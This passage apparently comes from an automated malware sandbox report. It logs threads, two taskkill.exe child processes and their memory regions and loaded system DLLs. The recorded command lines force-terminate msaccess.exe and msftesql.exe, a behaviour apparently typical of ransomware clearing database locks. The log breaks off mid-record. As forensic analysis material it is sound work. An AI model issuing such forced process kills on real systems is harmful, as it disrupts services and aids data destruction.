Thread: id = 280 os_tid = 0xd58 Thread: id = 281 os_tid = 0xd5c Thread: id = 283 os_tid = 0xd6c Thread: id = 284 os_tid = 0xd70 Thread: id = 285 os_tid = 0xd74 Thread: id = 286 os_tid = 0xd78 Thread: id = 287 os_tid = 0xd7c Thread: id = 288 os_tid = 0xd80 Thread: id = 289 os_tid = 0xd84 Thread: id = 291 os_tid = 0xd8c Thread: id = 303 os_tid = 0xdc8 Thread: id = 305 os_tid = 0xdd0 Thread: id = 306 os_tid = 0xdd4 Thread: id = 399 os_tid = 0xfb4 Thread: id = 404 os_tid = 0xcd4 Thread: id = 405 os_tid = 0xfa4 Thread: id = 429 os_tid = 0xf70 Thread: id = 430 os_tid = 0xfd8 Thread: id = 431 os_tid = 0xff0 Thread: id = 432 os_tid = 0xde4 Thread: id = 433 os_tid = 0xfc4 Thread: id = 434 os_tid = 0xfa8 Thread: id = 435 os_tid = 0xf3c Thread: id = 436 os_tid = 0xe44 Thread: id = 437 os_tid = 0xf50 Thread: id = 438 os_tid = 0xfe4 Thread: id = 439 os_tid = 0xfe0 Thread: id = 440 os_tid = 0xff8 Thread: id = 441 os_tid = 0xf6c Thread: id = 442 os_tid = 0xdbc Thread: id = 443 os_tid = 0xf98 Thread: id = 444 os_tid = 0xef8 Thread: id = 445 os_tid = 0x940 Thread: id = 446 os_tid = 0x934 Thread: id = 447 os_tid = 0xf94 Thread: id = 448 os_tid = 0xc4c Thread: id = 449 os_tid = 0xfc0 Thread: id = 450 os_tid = 0x1004 Thread: id = 452 os_tid = 0x1018 Thread: id = 456 os_tid = 0x1038 Thread: id = 458 os_tid = 0x1040 Thread: id = 461 os_tid = 0x1050 Thread: id = 462 os_tid = 0x1054 Thread: id = 469 os_tid = 0x108c Thread: id = 470 os_tid = 0x1090 Thread: id = 471 os_tid = 0x1094 Thread: id = 472 os_tid = 0x1098 Thread: id = 473 os_tid = 0x109c Thread: id = 474 os_tid = 0x10a0 Thread: id = 475 os_tid = 0x10a4 Thread: id = 476 os_tid = 0x10a8 Thread: id = 808 os_tid = 0x12f8 Thread: id = 809 os_tid = 0x1300 Thread: id = 810 os_tid = 0x324 Thread: id = 811 os_tid = 0x12fc Thread: id = 812 os_tid = 0xab0 Thread: id = 813 os_tid = 0x12ec Thread: id = 814 os_tid = 0x960 Thread: id = 882 os_tid = 0xa94 Thread: id = 1021 os_tid = 0xe50 Thread: id = 1022 os_tid = 0x4c4 Thread: id = 1025 os_tid = 0x1318 Thread: id = 1026 os_tid = 0xa10 Thread: id = 1027 os_tid = 0xb88 Process: id = "12" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7943c000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM msaccess.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 899 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 900 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 901 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 902 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 903 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 904 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 905 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 906 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 907 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 908 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 909 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 910 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 911 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 912 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 913 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1296 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1297 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1298 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1299 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1300 start_va = 0x70000 end_va = 0x73fff entry_point = 0x70000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1301 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1302 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1303 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1304 start_va = 0x190000 end_va = 0x24ffff entry_point = 0x190000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1305 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1306 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1307 start_va = 0x460000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1308 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1309 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1310 start_va = 0x640000 end_va = 0x7c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1311 start_va = 0x7d0000 end_va = 0x1bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1312 start_va = 0x1c50000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1313 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1314 start_va = 0x1dc0000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 1315 start_va = 0x1eb0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 1316 start_va = 0x1fd0000 end_va = 0x204ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1317 start_va = 0x2050000 end_va = 0x231efff entry_point = 0x2050000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1318 start_va = 0x2370000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 1319 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1320 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1321 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1322 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1323 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1324 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1325 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1326 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1327 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1328 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1329 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1330 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1331 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1332 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1333 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1334 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1335 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1336 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1337 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1338 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1339 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1340 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1341 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1342 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1343 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1344 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1345 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1346 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1347 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1348 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1349 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1350 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1351 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1352 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1353 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1354 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1355 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1356 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1357 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1358 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 97 os_tid = 0xafc Thread: id = 122 os_tid = 0xbdc Thread: id = 127 os_tid = 0x528 Thread: id = 131 os_tid = 0x7b4 Thread: id = 132 os_tid = 0x420 Process: id = "13" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7b05c000" os_pid = "0xb10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM msftesql.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 914 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 915 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 916 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 917 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 918 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 919 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 920 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 921 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 922 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 923 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 924 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 925 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 926 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 927 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 928 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1374 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1375 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1376 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1377 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1378 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1379 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1380 start_va = 0x260000 end_va = 0x263fff entry_point = 0x260000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1381 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1382 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1383 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1384 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1385 start_va = 0x2e0000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1386 start_va = 0x490000 end_va = 0x617fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1387 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1388 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1389 start_va = 0x810000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1390 start_va = 0x1c10000 end_va = 0x1ccffff entry_point = 0x1c10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1391 start_va = 0x1cd0000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 1392 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 1393 start_va = 0x1e00000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1394 start_va = 0x1e80000 end_va = 0x214efff entry_point = 0x1e80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1395 start_va = 0x21f0000 end_va = 0x226ffff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1396 start_va = 0x23a0000 end_va = 0x241ffff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1397 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1398 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1399 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1400 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1401 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1402 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1403 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1404 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1405 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1406 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1407 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1408 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1409 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1410 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1411 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1412 start_va = 0x7fefd3b0000 end_va = 